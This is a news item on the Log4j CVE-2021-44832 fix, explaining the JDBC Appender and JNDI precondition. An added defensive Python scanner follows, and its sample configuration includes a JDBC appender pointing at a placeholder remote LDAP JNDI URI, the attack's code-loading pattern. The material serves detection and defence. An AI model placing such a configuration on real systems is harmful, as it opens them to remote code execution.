Log4j 2.17.1 update with a fix for a limited-impact vulnerability

Bug-fix releases of the Log4j library, 2.17.1, 2.3.2-rc1 and 2.12.4-rc1, have been published, fixing a vulnerability (CVE-2021-44832). It is noted that the issue allows remote code execution (RCE), but it is rated as low severity (CVSS score 6.6) and is mostly of theoretical interest, since exploitation requires specific conditions: the attacker must be able to make changes to the Log4j configuration file, i.e. must already have access to the targeted system and the ability to change the value of the log4j2.configurationFile configuration parameter or to modify existing files containing logging settings.

The attack boils down to defining a JDBC Appender-based configuration on the local system that references an external JNDI URI, a request to which can return a Java class for execution. By default, the JDBC Appender is not configured to handle non-Java protocols, i.e. without a change to the configuration the attack is not possible. In addition, the issue affects only the log4j-core JAR and does not affect applications that use the log4j-api JAR without log4j-core. ...
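Because the precondition is a JDBC Appender whose DataSource resolves through a non-`java:` JNDI name, a defender can audit deployed log4j2.xml files for exactly that pattern. The following scanner is an added example (not code from the article or from the Log4j project); the embedded configuration and the placeholder host in it are constructed for illustration.

```python
"""Flag JDBC Appenders in a Log4j 2 XML configuration whose DataSource
uses a JNDI name with a scheme other than the local `java:` one."""
import xml.etree.ElementTree as ET

# Constructed sample log4j2.xml (not a real deployment's file): one JDBC
# appender uses a normal in-container DataSource, the other an external URI.
SAMPLE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="warn">
  <Appenders>
    <Console name="Stdout" target="SYSTEM_OUT"/>
    <JDBC name="AuditDb" tableName="audit_log">
      <DataSource jndiName="java:comp/env/jdbc/auditDs"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
    <JDBC name="Suspicious" tableName="events">
      <DataSource jndiName="ldap://placeholder.example:1389/o=ref"/>
      <Column name="message" pattern="%m"/>
    </JDBC>
  </Appenders>
  <Loggers><Root level="info"><AppenderRef ref="Stdout"/></Root></Loggers>
</Configuration>
"""

LOCAL_SCHEME = "java"  # the only scheme the hardened releases accept


def find_jndi_datasources(config_xml: str) -> list[tuple[str, str]]:
    """Return (appender name, jndiName) for every JDBC appender that
    obtains its DataSource via JNDI. Element names are matched
    case-insensitively, as Log4j itself tolerates either spelling."""
    root = ET.fromstring(config_xml)
    found = []
    for el in root.iter():
        if el.tag.lower() != "jdbc":
            continue
        for ds in el.iter():
            if ds.tag.lower() == "datasource" and ds.get("jndiName"):
                found.append((el.get("name", "?"), ds.get("jndiName")))
    return found


def is_remote_jndi(jndi_name: str) -> bool:
    """True when the name carries a scheme other than `java:`; names with
    no scheme at all are treated as local container lookups."""
    scheme = jndi_name.split(":", 1)[0].lower() if ":" in jndi_name else ""
    return scheme not in ("", LOCAL_SCHEME)


def flag_config(config_xml: str) -> list[tuple[str, str]]:
    """Appenders in the config that match the CVE-2021-44832 precondition."""
    return [(n, j) for n, j in find_jndi_datasources(config_xml) if is_remote_jndi(j)]
```

Run `flag_config` over each configuration file an application can load (including any path named by `log4j2.configurationFile`); any hit means the configuration, not merely the library version, needs review.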

source: budenet.ru
